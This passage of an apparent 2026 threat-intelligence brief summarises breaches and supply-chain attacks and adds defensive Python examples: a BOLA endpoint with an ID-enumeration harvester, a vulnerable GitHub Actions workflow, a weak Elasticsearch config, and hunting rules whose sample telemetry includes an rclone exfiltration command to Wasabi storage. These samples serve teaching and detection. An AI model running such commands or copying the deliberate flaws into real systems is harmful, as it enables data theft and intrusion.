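@dataclass(frozen=True)
class Participant:
    id: int
    employer_id: int
    name: str
    ssn: str  # full SSN kept here only to make the exposure concrete; values are made up


@dataclass(frozen=True)
class Session:
    role: str               # "participant" or "employer_admin" (constructed roles)
    participant_id: int = 0  # set for plan-participant logins
    employer_id: int = 0     # set for employer HR administrators


class NotFound(Exception):
    pass


# Constructed records spanning two employer tenants (7 and 9).
PARTICIPANTS = {
    1001: Participant(1001, 7, "A. Example", "123-45-0001"),
    1002: Participant(1002, 7, "B. Example", "123-45-0002"),
    1003: Participant(1003, 9, "C. Example", "123-45-0003"),
    1004: Participant(1004, 9, "D. Example", "123-45-0004"),
}


def get_participant_vulnerable(session, participant_id):
    """GET /participants/{id} with authentication but no ownership check.
    Any logged-in user can walk the ID space and read every record: that is the BOLA."""
    rec = PARTICIPANTS.get(participant_id)
    if rec is None:
        raise NotFound
    return rec


def authorized(session, rec):
    """Object-level authorization: the caller owns the record or administers its tenant."""
    if session.role == "participant":
        return session.participant_id == rec.id
    if session.role == "employer_admin":
        return session.employer_id == rec.employer_id
    return False


def get_participant_hardened(session, participant_id):
    """Same endpoint with the check. Unauthorized and missing records both raise NotFound,
    so the response does not become an oracle for which IDs exist."""
    rec = PARTICIPANTS.get(participant_id)
    if rec is None or not authorized(session, rec):
        raise NotFound
    return rec


def enumerate_ids(handler, session, id_range):
    """What exploitation looks like: iterate sequential IDs and keep whatever comes back."""
    harvested = []
    for pid in id_range:
        try:
            harvested.append(handler(session, pid))
        except NotFound:
            continue
    return harvested


def redact_for_caller(rec):
    """Response shaping: even an authorized read should not return the full SSN."""
    return {"id": rec.id, "name": rec.name, "ssn_last4": rec.ssn[-4:]}


if __name__ == "__main__":
    attacker = Session(role="participant", participant_id=1003)
    print("vulnerable:", [r.id for r in enumerate_ids(get_participant_vulnerable, attacker, range(1000, 1010))])
    print("hardened:  ", [r.id for r in enumerate_ids(get_participant_hardened, attacker, range(1000, 1010))])
```

Two details matter beyond the check itself. Returning the same NotFound for "does not exist" and "not yours" denies the attacker an enumeration oracle, and sequential integer IDs make the walk trivial, so the check has to live in the handler regardless of how guessable the identifiers are. A 24-day window at the rate a script can iterate IDs is more than enough to drain 2.7 million records.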

. Individuals Affected: 2,697,540

. Intrusion Window: 24 days (Dec 22, 2025 - Jan 15, 2026)

. Vulnerability: BOLA - OWASP API Security #1

. Data Exposed: SSNs, DOBs, addresses, enrollment records, dependent info, HRA/FSA/COBRA records

. Downstream Victims: HackerOne (287 employees), Washington HCA (~35,600 members)

. Class Actions: At least 9 federal lawsuits filed

Sources: BleepingComputer, The Register, SecurityWeek, Security Affairs, HIPAA Journal, ClassAction.org, Washington State Health Care Authority, WA HCA FAQ (HCA 50-0132), WA HCA GovDelivery Bulletin, CyberSecurityNews, Paubox, GlobeNewswire, Justia Federal Court Dockets (Western District of Washington), Law.com Radar, ClaimDepot, SC Media, TechRadar, CyberNews, CPO Magazine, TechRepublic, The Lyon Firm, DEV Community

Full Analysis: https://zerotolerance.me/cyberthreats/navia-benefit-solutions-bola-api-breach

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

10. NasirSecurity: Pro-Iranian Group Targets Gulf Energy Supply Chains

UAE / Oman / Iraq / Saudi Arabia | NasirSecurity | March 26, 2026

Pro-Iranian threat actor NasirSecurity - operating under rotating aliases including Sons of Hezbollah Lebanon, Sons of Al-Nusayr, and Al-Nasir Resistance - claimed breaches of four Gulf energy companies: Dubai Petroleum (UAE), CC Energy Development (Oman), an unnamed Iraqi oil and gas firm, and Al-Safi Oil Company (Saudi Arabia).

The group claimed 827 GB of exfiltrated data.

Resecurity's investigation revealed the critical finding: the group did not breach any of the energy majors directly.

All stolen data originated from third-party supply chain vendors - contractors and subcontractors involved in engineering, safety, and construction - who serve the energy sector. The group then presented the stolen documents as if obtained from the energy companies themselves.

Despite the inflated claims, the authentic documents - engineering schematics, construction contracts, risk assessments, and fire safety vendor records - could provide adversaries with a roadmap for planning physical attacks on Gulf energy infrastructure.

This is a distinct operation from the Handala and MuddyWater campaigns, establishing at least three concurrent Iranian-aligned cyber operations in March 2026.

. Claimed Victims: 4 (Dubai Petroleum, CC Energy Development, unnamed Iraqi firm, Al-Safi Oil)

. Claimed Data: 827 GB (assessed as overstated by Resecurity)

. Actual Vector: Supply chain compromise via BEC and spear phishing of third-party contractors

. Activity Period: October 2025 - March 2026

Sources: Resecurity, Security Affairs, The420.in, Dark Reading, Ransomware.live, RansoLook.io, WatchGuard, HookPhish, Hackmanac, ZERO|TOLERANCE OSINT Investigation

Full Analysis: https://zerotolerance.me/cyberthreats/nasirsecurity-gulf-energy-supply-chain

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

11. Trivy Supply Chain Attack: Security Scanner Weaponized, 1,000+ Cloud Environments Infected

Global | TeamPCP (DeadCatx3/PCPcat/ShellForce) | Feb 28 - Mar 25, 2026

The attack ran in two phases. On February 28, hackerbot-claw exploited a pull_request_target misconfiguration in the project's GitHub Actions workflow to steal a GitHub Personal Access Token. The main attack followed on March 19, after the stolen token survived a non-atomic credential rotation.

TeamPCP force-pushed 76 of 77 trivy-action tags to credential-stealing malware, poisoned Docker images across Docker Hub, GHCR, and ECR, and deployed CanisterWorm - a self-propagating npm worm using ICP blockchain canisters for command and control, the first documented use of this technique.

The credential stealer bypassed GitHub Actions log-masking via /proc/pid/mem. The campaign cascaded into Checkmarx KICS (35 tags), LiteLLM PyPI (95M monthly downloads), and a geopolitically-targeted Kubernetes wiper destroying Iranian systems.
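
The pull_request_target misconfiguration that opened the first link of the chain is easy to describe and easy to miss in review: the trigger runs the workflow with the base repository's token and secrets, which is safe only as long as the job never executes code from the pull request, and a checkout of the PR head followed by a build step does exactly that. The audit below is an added example (not the Trivy project's tooling and not a reconstruction of its actual workflow): it scans workflow text for the trigger and for a checkout whose ref resolves to the PR head. It is regex-based rather than a YAML parser, so it assumes the conventional layout shown in the samples; the three workflows are constructed for the example.

```python
"""Audit GitHub Actions workflows for pull_request_target plus an untrusted checkout (added example)."""
import re

# `pull_request_target` as a key or list item inside the top-level `on:` block.
PRT_RE = re.compile(r"^\s*-?\s*pull_request_target\s*:?\s*(?:#.*)?$")
TOP_LEVEL_ON_RE = re.compile(r"^(?:on|\"on\"|'on'|true):\s*(.*)$")
CHECKOUT_RE = re.compile(r"^\s*-?\s*uses:\s*actions/checkout")
# A checkout ref that follows the PR head means fork-controlled code on the runner.
UNTRUSTED_REF_RE = re.compile(
    r"ref:\s*\$\{\{\s*(?:github\.event\.pull_request\.head\.(?:ref|sha)|github\.head_ref)\s*\}\}"
)
STEP_START_RE = re.compile(r"^\s*-\s")


def audit_workflow(text):
    """Return findings as dicts with severity, 1-based line and issue text."""
    lines = text.splitlines()
    uses_prt = False
    in_on = False
    for line in lines:
        m = TOP_LEVEL_ON_RE.match(line)
        if m:
            in_on = True
            if "pull_request_target" in m.group(1):  # inline form: on: [push, pull_request_target]
                uses_prt = True
            continue
        if in_on and line and not line[0].isspace():  # next top-level key closes the on: block
            in_on = False
        if in_on and PRT_RE.match(line):
            uses_prt = True

    untrusted_checkouts = []
    for i, line in enumerate(lines):
        if not CHECKOUT_RE.match(line):
            continue
        j = i + 1  # scan this step's `with:` block until the next step starts
        while j < len(lines) and lines[j].strip() and not STEP_START_RE.match(lines[j]):
            if UNTRUSTED_REF_RE.search(lines[j]):
                untrusted_checkouts.append(i + 1)
                break
            j += 1

    findings = []
    if uses_prt and untrusted_checkouts:
        for n in untrusted_checkouts:
            findings.append({
                "severity": "critical", "line": n,
                "issue": "pull_request_target checks out the PR head: fork-controlled code runs "
                         "with the base repository's token and secrets",
            })
    elif uses_prt:
        findings.append({
            "severity": "info", "line": 0,
            "issue": "pull_request_target in use; confirm no step runs PR-controlled code or scripts",
        })
    return findings


# Constructed workflows for the example.
VULNERABLE_WORKFLOW = """\
name: PR check
on:
  pull_request_target:
    types: [opened, synchronize]
permissions:
  contents: write
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - run: npm ci && npm test
"""
SAFE_WORKFLOW = """\
name: PR check
on:
  pull_request:
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci && npm test
"""
PRT_LABELER_WORKFLOW = """\
name: Label
on: [pull_request_target]
jobs:
  label:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/labeler@v5
"""

if __name__ == "__main__":
    for name, wf in (("vulnerable", VULNERABLE_WORKFLOW), ("safe", SAFE_WORKFLOW), ("labeler", PRT_LABELER_WORKFLOW)):
        print(name, audit_workflow(wf))
```

The safe form for anything that builds or tests PR code is the plain `pull_request` trigger, which runs with a read-only token and no secrets for fork PRs. `pull_request_target` belongs only to jobs that act on PR metadata (labelling, commenting) and never check out or execute the contributor's tree. Note also what the stolen token then did: GitHub's log masking only redacts secrets it recognises in output, and a stealer that reads `/proc/<pid>/mem` never goes through the log, so masking is not a boundary.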

44 Aqua Security internal repos were defaced. Mandiant CTO stated at RSA Conference 2026 that 1,000+ SaaS environments were compromised, with projections exceeding 10,000.

This is the first link in the Trivy-LiteLLM-Telnyx credential chain - the most significant software supply chain campaign of 2026.

. CVE: CVE-2026-33634 (CVSS v4: 9.4, NVD v3.1: 8.8, vendor v3.1: 9.9, CWE-506)

. Infected: 1,000+ cloud environments (Mandiant); projected 10,000+

. Ecosystems: 5 (GitHub Actions, Docker Hub, npm, Open VSX, PyPI)

. Tags Hijacked: 76/77 (trivy-action) + 7 (setup-trivy) + 35 (Checkmarx KICS)

. Actor: TeamPCP (60,000+ servers in Dec 2025 campaign; hybrid motivation including anti-Iran wiper)

Sources: The Hacker News, The Register, BleepingComputer, Infosecurity Magazine, SecurityWeek, CyberScoop, Dark Reading, Microsoft Security Blog, Aqua Security, Wiz, Palo Alto Networks (Prisma Cloud), CrowdStrike, Socket.dev, StepSecurity, GitGuardian, Mandiant (Google Cloud), Orca Security, Aikido Security, Mend.io, Snyk, ReversingLabs, Datadog Security Labs, Endor Labs, Arctic Wolf, Kaspersky, Sysdig, Cloud Security Alliance, Checkmarx, Docker, GitHub Advisory (GHSA-69fq-xp46-6x23), Tenable (NVD), ZERO|TOLERANCE Independent OSINT Verification (March 27, 2026)

Full Analysis: https://zerotolerance.me/cyberthreats/trivy-supply-chain-cve-2026-33634

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

12. LiteLLM PyPI Backdoor: AI Framework with 480M Downloads Compromised by TeamPCP

Global | TeamPCP | March 24, 2026

TeamPCP compromised LiteLLM - an AI/LLM proxy framework with approximately 480 million total PyPI downloads - using credentials stolen during the Trivy supply chain attack. This is the second link in the Trivy-LiteLLM-Telnyx credential chain.

The malicious package versions contained a credential harvester targeting cloud API keys, AWS credentials, database connection strings, and AI model API tokens.

The attack exploited the trust relationship between open-source AI tooling and production environments where LiteLLM commonly runs as a middleware layer between applications and LLM providers.

LiteLLM's position in AI infrastructure makes this particularly dangerous: organizations using it as a proxy to OpenAI, Anthropic, Azure, and other LLM providers expose API keys worth thousands of dollars per month.

The compromise was detected through anomalous PyPI publishing patterns and community vigilance.

. Package: litellm (PyPI)

. Downloads: ~480M total / ~95M monthly

. Vector: Stolen credentials from Trivy compromise (credential chaining)

. Payload: Credential harvester targeting cloud and AI API keys

. Actor: TeamPCP (same campaign as Trivy and Telnyx)

. Campaign Position: Link 2 of 3 (Trivy - LiteLLM - Telnyx)

Sources: Datadog Security Labs, Wiz, ReversingLabs, The Hacker News, Kaspersky, Snyk, LiteLLM Official Blog (docs.litellm.ai/blog/security-update-march-2026), Palo Alto Networks, The Register, Endor Labs, Help Net Security, Mandiant, Microsoft Security Blog, Aqua Security, CrowdStrike, Socket.dev, StepSecurity, Aikido Security, ZERO|TOLERANCE Independent OSINT Verification (March 27, 2026)

Full Analysis: https://zerotolerance.me/cyberthreats/litellm-teampcp-pypi-supply-chain

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

13. European Commission: ShinyHunters Claim 350GB AWS Cloud Breach - Second Hack in Two Months

EU | ShinyHunters | March 24-29, 2026

The European Commission - the body that drafted and enforces GDPR - was breached for the second time in under two months. On March 24, attackers compromised at least one AWS account hosting the Commission's Europa.eu web platform.

ShinyHunters posted the claim on March 28, alleging 350+ GB of data including mail server dumps, database exports, confidential documents, and contracts.

AWS stated that "AWS did not experience a security event", which places the failure on the customer side of the shared-responsibility line: the Commission's own account, its credentials, or its configuration.

This follows the January 30 breach in which attackers exploited Ivanti EPMM zero-days (CVE-2026-1281, CVE-2026-1340) to compromise the Commission's MDM infrastructure.

The regulatory framework governing EU institution breaches is Regulation (EU) 2018/1725 (not GDPR), supervised by the EDPS. Two breaches of the GDPR enforcer in under two months severely undermines the Commission's credibility on data protection enforcement.

. Claimed Data: 350+ GB (mail servers, databases, documents, contracts)

. Target: Europa.eu AWS cloud infrastructure

. Actor: ShinyHunters (UNC6040/UNC6240/UNC6395)

. EC Confirmation: "Data have been taken from those websites"

. Prior Breach: Jan 30 - MDM breach via Ivanti zero-days

. Staff Count: ~32,000 employees

Sources: BleepingComputer, TechCrunch, Bloomberg, SecurityAffairs, Hackread, Cybernews, CyberKendra, RedPacket Security, Engadget, IBTimes SG, CSO Online, CybersecurityNews, Computing.co.uk, BrightDefense, HelpNetSecurity, The Record, EDPS, EUR-Lex, CERT-EU Advisory (Cyber Brief 26-03), Rapid7, Ivanti Advisory, CISA KEV, GreyNoise, Google Cloud Blog (Mandiant), Obsidian Security, Wikipedia, Stibbe, Mayer Brown

Full Analysis: https://zerotolerance.me/cyberthreats/european-commission-aws-shinyhunters-breach

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

14. APT IRAN's 375TB Lockheed Martin Claim: Fabricated Data Dump, Real Information Operation

USA / Israel | APT IRAN (self-named) / Handala | March 20-30, 2026

A group calling itself "APT IRAN" - a low-tier pro-Iranian hacktivist collective with a self-assigned name, not a recognized APT group - claimed on March 20 to have exfiltrated 375 terabytes from Lockheed Martin and demanded more than $400 million in ransom.

The data was listed on "THREAT MARKET," an obscure onion marketplace absent from every major dark web tracker, with a stated exclusive buyout price of $598.5 million. After ten days, zero verified data samples have been released. Lockheed Martin denied the claim twice.

No SEC 8-K filing, no CISA advisory, and no law enforcement statement has been issued. For context, the documented Chinese theft of F-35 data via operations revealed in the Snowden documents exfiltrated approximately 50TB over a period of years.

Separately, on March 26, the real MOIS-backed Handala group launched "Operation Lockheed Martin," publishing passport scans and personal details of 28 Lockheed Martin engineers working in Israel on F-35, F-22, and THAAD programs, accompanied by death threats.

The two operations - one fabricated, one verified - create amplified psychological impact. Whether coordinated or opportunistic, the strategic effect serves Iran's wartime information warfare objectives.

Distinguishing fabricated claims from real operations is itself an intelligence requirement.

• APT IRAN Claim: 375TB Lockheed Martin data (UNVERIFIED - zero samples released after 10 days)

• Marketplace: THREAT MARKET - not tracked by any major dark web tracker

• Pricing: $374.8M total value / $598.5M exclusive buyout (theatrical)

• Lockheed Martin: Two denials, no SEC 8-K, no CISA advisory

• Handala Operation: 28 engineers doxxed with passport scans, death threats (VERIFIED - real)

• Programs Exposed: F-35, F-22, THAAD

Sources: Hackread, Cybersecurity Dive, SC Media, Cyber Daily, UpGuard, CyberNews, Security Boulevard, Netcrook, ThreatBeat, CyberHub Podcast (James Azar), Palo Alto Networks Unit 42, SOCRadar, Check Point Research, Krebs on Security, DarkWebInformer (@DailyDarkWeb), Lockheed Martin official statements, CSIS, The Diplomat (F-35/Snowden context), ZERO|TOLERANCE prior coverage (Handala FBI Director Patel Gmail Hack)

Full Analysis: https://zerotolerance.me/cyberthreats/apt-iran-lockheed-martin-375tb-fabrication

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

15. TELUS Digital: ShinyHunters Steal 1 Petabyte via Stolen GCP Credentials

Canada / Global | ShinyHunters (UNC6040/UNC6395) / SLH Collective | March 12, 2026

TELUS Digital (US$2.658B revenue, ~79,000 employees, 35+ countries) confirmed a multi-month breach by ShinyHunters. The attack chain began with GCP credentials discovered in Salesloft Drift supply chain breach data from August 2025 (760 companies affected).

Credential scanning via Trufflehog led to BigQuery access, then lateral movement across TELUS systems over an estimated 5-7 months.

Stolen data spans customer support tickets, voice recordings, FBI background checks, source code, AI training datasets, financial records, call detail records, and fraud detection systems for at least 28 BPO client companies.

ShinyHunters demanded $65 million in ransom - TELUS did not engage. TELUS Corp stock dropped 6.8% post-disclosure.

This is the largest confirmed data breach by volume in 2026 to date, and demonstrates how a single supply chain credential compromise can cascade across an entire business process outsourcing ecosystem.

• Data Stolen: ~1 Petabyte (700TB-1PB) from 28 alleged client companies

• Ransom Demand: $65,000,000 (not paid)

• Vector: Supply chain credential pivot from Salesloft Drift → GCP → BigQuery

• Dwell Time: Estimated 5-7 months

• Actor: ShinyHunters / UNC6040 / UNC6395 (SLH collective since Aug 2025)

Sources: BleepingComputer, TechRadar, Cybersecurity Dive, The Register, Hackread, CSO Online, CBC News, The Globe and Mail, CloudTweaks, Breached.Company, Bitdefender, SafeState, Prism News, MobileSyrup, Bloomberg, Yahoo Finance, Google Cloud Blog (Mandiant), FINRA, UpGuard, The Hacker News, Resecurity, Obsidian Security, LevelBlue, DataBreaches.Net, CPO Magazine, Outsource Accelerator, Simply Wall St, Wikipedia

Full Analysis: https://zerotolerance.me/cyberthreats/telus-digital-shinyhunters-1pb

16. Infutor: 676 Million Records Including SSNs Exposed via Misconfigured Elasticsearch

USA | Spirigatito | March 8, 2026

An Elasticsearch 8.15.2 instance with security explicitly disabled exposed 676,798,866 consumer identity records (91.72 GB), including full Social Security numbers.

SOCRadar discovered the exposure on March 3; threat actor Spirigatito posted the full dataset on BreachForums on March 8-9, explicitly crediting SOCRadar's article for finding the open instance.

The data is attributed to Infutor - a data broker sold by Verisk ($223.5M acquisition) to ActiveProspect in January 2026, eight weeks before the discovery.

This is the largest PII exposure of 2026 by record count and is particularly notable because Elasticsearch 8.0+ enables security by default - meaning someone explicitly disabled it. Neither Infutor, Verisk, nor ActiveProspect has responded publicly.

Three law firms are investigating class actions. No breach notifications have been filed and no credit monitoring has been offered to the 676 million affected individuals, most of whom have no relationship with and no awareness of Infutor.
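The brief's point is that Elasticsearch 8.x ships with security switched on, so an open index like this one is the result of a deliberate configuration change. The script below is an added example (not from the brief, from SOCRadar, or from Elastic) that audits a flat elasticsearch.yml for that change and for a listener bound beyond loopback. Both configuration samples are constructed, the cluster name is a placeholder, and the parser is a minimal key: value reader rather than a YAML library.

```python
"""Audit a flat elasticsearch.yml for the exposure pattern described above.

Added example, not the brief's or Elastic's code. It flags the combination that
turns an index into a public download: X-Pack security switched off and the
HTTP listener bound to a non-loopback address. A minimal line reader handles
flat `key: value` settings so the script runs offline without a YAML library.
"""
import re

# Constructed sample: a node configured the way the exposed instance was
# described (security explicitly disabled). The cluster name is a placeholder.
WEAK_CONFIG = """\
cluster.name: example-cluster        # placeholder
network.host: 0.0.0.0
http.port: 9200
xpack.security.enabled: false
"""

# Constructed sample: the same node with the 8.x defaults restored.
HARDENED_CONFIG = """\
cluster.name: example-cluster        # placeholder
network.host: 127.0.0.1
http.port: 9200
xpack.security.enabled: true
xpack.security.http.ssl.enabled: true
"""

SETTING_RE = re.compile(r"^\s*([A-Za-z0-9_.]+)\s*:\s*(.*?)\s*(?:#.*)?$")

# Values of network.host that keep the REST API off the network.
LOOPBACK_HOSTS = {"", "127.0.0.1", "::1", "localhost", "_local_"}


def parse_settings(text: str) -> dict:
    """Return the flat `key: value` pairs; comments and blank lines are skipped."""
    settings = {}
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        match = SETTING_RE.match(line)
        if match:
            settings[match.group(1)] = match.group(2).strip("\"'")
    return settings


def audit(text: str) -> list:
    """Return human-readable findings; an empty list means the file is acceptable."""
    settings = parse_settings(text)
    findings = []
    # Elasticsearch 8.x enables xpack.security by default, so an explicit
    # "false" is an operator decision, which is the brief's point.
    security_on = settings.get("xpack.security.enabled", "true").lower() != "false"
    host = settings.get("network.host", "_local_")
    port = settings.get("http.port", "9200")
    bound_publicly = host not in LOOPBACK_HOSTS

    if not security_on:
        findings.append("xpack.security.enabled is false: no authentication on the REST API")
        if bound_publicly:
            findings.append(
                f"network.host={host} with security disabled: every index is readable "
                f"by anyone who can reach TCP/{port}"
            )
    if bound_publicly and settings.get("xpack.security.http.ssl.enabled", "false").lower() != "true":
        findings.append("HTTP TLS not enabled on a non-loopback listener")
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit(cfg) or ["no findings"])
```

Run it against a real node's elasticsearch.yml to get the same three findings the weak sample produces; the check is deliberately conservative and treats any explicit `xpack.security.enabled: false` as a finding even on a loopback-only node, because the listener binding is the easier of the two settings to change later.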

• Records: 676,798,866 (91.72 GB) - SSNs, DOBs, names, address histories, phones

• Vector: Elasticsearch 8.15.2 with security explicitly disabled

• Actor: Spirigatito (posted to BreachForums)

• Ownership: Infutor → Verisk (2022) → ActiveProspect (Jan 2026)

• Status: No company response; 3 law firms investigating; no breach notifications filed

Sources: SOCRadar, Biometric Update, Prism News, DailyDarkWeb, DarkNetSearch, DataBreach.io, ClassAction.org, Class Action U, Chimicles Schwartz Kriner & Donaldson-Smith LLP, Dark Web Informer, HackNotice, CYFIRMA, Verisk Newsroom, ActiveProspect, GlobeNewsWire, Inc.

Full Analysis: https://zerotolerance.me/cyberthreats/infutor-676m-ssn-exposure

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

17. Salford City College: DragonForce Exfiltrates 256GB Including Mental Health Records

United Kingdom | DragonForce + Qilin (cartel alliance) | March 6, 2026

The DragonForce ransomware cartel claims to have exfiltrated 256.92 GB from Salford City College (~8,981 learners, 4,480 of them aged 16-18), including confidential mental health assessment forms and spreadsheets of personal information.

The college was dual-listed by DragonForce (March 6) and Qilin (March 10) under the DragonForce-Qilin-LockBit cartel alliance. It confirmed "IT disruption" but issued no public breach statement.

Mental health records for students aged 16-18 constitute special category data under UK GDPR Article 9 with additional protections under Recital 38 (children's data).

DragonForce has approximately 430-440 victims since late 2023 and was responsible for the M&S GBP 300M attack; 4 NCA arrests occurred in July 2025. Only 37% of UK further education colleges have dedicated cybersecurity staff - a statistic that helps explain why 85% have experienced a breach in the past 12 months.

• Data: 256.92 GB (mental health records, personal data, administrative documents)

• Target: ~8,981 learners across 5 campuses (4,480 aged 16-18)

• Actor: DragonForce (~430-440 victims) + Qilin (dual-listed under cartel alliance)

• Sector: UK Further Education (85% of FE colleges breached in past 12 months)

Sources: FalconFeeds, Comparitech, DailyDarkWeb, DeXpose, Ransomware.live, RedPacket Security, Netcrook, Breachsense, Naomi Korn Associates, SentinelOne, Group-IB, Trend Micro, LevelBlue, Acronis TRU, Darktrace, Picus Security, BleepingComputer, The Hacker News, Dark Reading, Computer Weekly, Infosecurity Magazine, Help Net Security, BlackFog, UK Gov Cyber Security Breaches Survey 2025, Jisc, NCSC, Ofsted

Full Analysis: https://zerotolerance.me/cyberthreats/dragonforce-salford-city-college

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

18. MuddyWater Pre-Positions Dindoor and Fakeset Backdoors on US Bank, Airport, Defense Networks

USA / Israel / Canada | MuddyWater / Seedworm / MOIS | March 5, 2026

Iran's MuddyWater pre-positioned two novel backdoors on the networks of a US bank, a US airport, a US defense software company with Israeli operations, and two non-profit organizations in the US and Canada.

The intrusions began in early February 2026 - weeks before the February 28 US-Israeli military strikes - meaning Iranian intelligence had established persistent access to US critical infrastructure before hostilities commenced.

Symantec's Broadcom Threat Hunter Team published its findings on March 5, warning that other organizations could still be vulnerable.

The Dindoor backdoor leverages the Deno JavaScript/TypeScript runtime to evade detection calibrated for PowerShell and Python. The Fakeset backdoor uses Python delivered from Backblaze B2 cloud storage with data exfiltration via Rclone to Wasabi cloud buckets.

Both were signed with code-signing certificates previously linked to MuddyWater malware by Google, Microsoft, and Kaspersky.

This pre-positioning operation, combined with concurrent Handala operations, establishes that Iran's MOIS was running multiple distinct cyber campaigns simultaneously against US targets.

• Victims: US bank, US airport, US defense software company (Israeli operations), Canadian and US non-profits

• Actor: MuddyWater / Seedworm (MOIS-linked)

• Backdoors: Dindoor (Deno-based, novel) and Fakeset (Python-based)

• Pre-Positioning: Intrusions began early February 2026 - before February 28 airstrikes

• C2: Sliver framework on port 31337

• Exfiltration: Rclone to Wasabi cloud storage

Sources: Symantec/Broadcom Threat Hunter Team, Check Point Research, The Register, The Hacker News, SecurityWeek, Help Net Security, Infosecurity Magazine, Security Affairs, Cybernews, SOCRadar, Krypt3ia, Shodan, crt.sh, WHOIS/RDAP

Full Analysis: https://zerotolerance.me/cyberthreats/muddywater-dindoor-fakeset-us-infrastructure
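The observables this entry lists (the Deno runtime, Sliver on port 31337, Rclone to Wasabi, Python delivered from Backblaze B2) translate directly into hunting logic. The script below is an added example, not the brief's or Symantec's code, and it runs four such rules over constructed endpoint telemetry: the event format, hostnames, paths and the 203.0.113.0/24 and 198.51.100.0/24 addresses are all placeholders, and the rules are illustrations of the brief's indicators rather than Symantec's published detections.

```python
"""Hunt for the Dindoor/Fakeset tradecraft the brief summarizes, over sample telemetry.

Added example, not the brief's or Symantec's code. Four rules map to the
observables the text names: the Deno runtime launched from a shell, outbound
traffic to TCP/31337 (the Sliver C2 port reported), Rclone invoked against a
Wasabi endpoint, and a Python process fetching from Backblaze B2. The event
format and every event below are constructed; hosts, paths and addresses are
placeholders.
"""
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Constructed telemetry. Fields: ts|host|kind|image|parent_image|cmdline|dst
SAMPLE_EVENTS = [
    r"2026-03-02T01:12:04Z|ws-042|process|C:\Users\u\AppData\Local\deno\deno.exe|C:\Windows\System32\cmd.exe|deno run -A C:\Users\u\AppData\Local\Temp\update.ts|",
    r"2026-03-02T01:12:09Z|ws-042|network|C:\Users\u\AppData\Local\deno\deno.exe||deno run -A C:\Users\u\AppData\Local\Temp\update.ts|203.0.113.10:31337",
    r"2026-03-02T01:15:00Z|ws-042|process|C:\Users\u\AppData\Local\Temp\rclone.exe|C:\Windows\System32\cmd.exe|rclone copy C:\Users\u\Documents remote:bucket --s3-endpoint s3.wasabisys.com|",
    r"2026-03-02T01:20:00Z|ws-042|network|C:\Python311\python.exe||python -c loader|f001.backblazeb2.com:443",
    # Benign: a developer running Deno from the editor, and ordinary browsing.
    r"2026-03-02T09:00:00Z|dev-007|process|C:\Users\dev\.deno\bin\deno.exe|C:\Program Files\Microsoft VS Code\Code.exe|deno test|",
    r"2026-03-02T09:05:00Z|ws-011|network|C:\Program Files\Mozilla Firefox\firefox.exe||firefox.exe|198.51.100.7:443",
]

SHELL_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
C2_PORT = 31337


@dataclass
class Event:
    ts: str
    host: str
    kind: str
    image: str
    parent: str
    cmdline: str
    dst: str

    @property
    def image_name(self) -> str:
        return PureWindowsPath(self.image).name.lower()

    @property
    def parent_name(self) -> str:
        return PureWindowsPath(self.parent).name.lower()

    @property
    def dst_port(self) -> int:
        return int(self.dst.rsplit(":", 1)[1]) if self.dst else -1


def parse(line: str) -> Event:
    """Split one constructed telemetry line into its seven fields."""
    return Event(*line.split("|", 6))


def evaluate(ev: Event) -> list:
    """Return the rule names an event trips; an empty list means benign."""
    hits = []
    cmd = ev.cmdline.lower()
    # Dindoor: Deno runtime spawned by a shell rather than a developer tool.
    if ev.kind == "process" and ev.image_name == "deno.exe" and ev.parent_name in SHELL_PARENTS:
        hits.append("deno_spawned_from_shell")
    # Sliver C2 on the port reported in the brief.
    if ev.kind == "network" and ev.dst_port == C2_PORT:
        hits.append("outbound_tcp_31337")
    # Fakeset exfiltration: Rclone pointed at Wasabi storage.
    if ev.image_name == "rclone.exe" and "wasabi" in cmd:
        hits.append("rclone_to_wasabi")
    # Fakeset delivery: a Python process pulling from Backblaze B2.
    if ev.kind == "network" and ev.image_name == "python.exe" and "backblazeb2.com" in ev.dst.lower():
        hits.append("python_fetch_from_backblaze_b2")
    return hits


def hunt(lines) -> list:
    """Return (host, ts, rule) tuples for every rule hit across the telemetry."""
    alerts = []
    for line in lines:
        ev = parse(line)
        for rule in evaluate(ev):
            alerts.append((ev.host, ev.ts, rule))
    return alerts


if __name__ == "__main__":
    for alert in hunt(SAMPLE_EVENTS):
        print(*alert)
```

The two benign events are there on purpose: Deno launched from an editor and browser traffic on 443 trip nothing, so the rules stay useful on a fleet where developers legitimately use the runtime. Port and cloud-provider matches are weak signals on their own; in a real deployment the value comes from seeing several of them on one host within minutes, as the sample does for ws-042.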

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

19. Interlock Ransomware Exploits Cisco FMC Zero-Day (CVE-2026-20131) - CVSS 10.0

USA / Global | Interlock (Hive0163) | January 26 - March 4, 2026

Interlock ransomware exploited CVE-2026-20131 - a critical insecure deserialization flaw (CWE-502, CVSS 10.0) in Cisco Secure Firewall Management Center and Security Cloud Control - for 36 days before Cisco's March 4 disclosure.

The flaw allows unauthenticated remote code execution as root via crafted serialized Java objects. It affects 69+ FMC versions (6.4.0.13 through 10.0.0); there is no fix for 6.x (EOL) and no workaround.

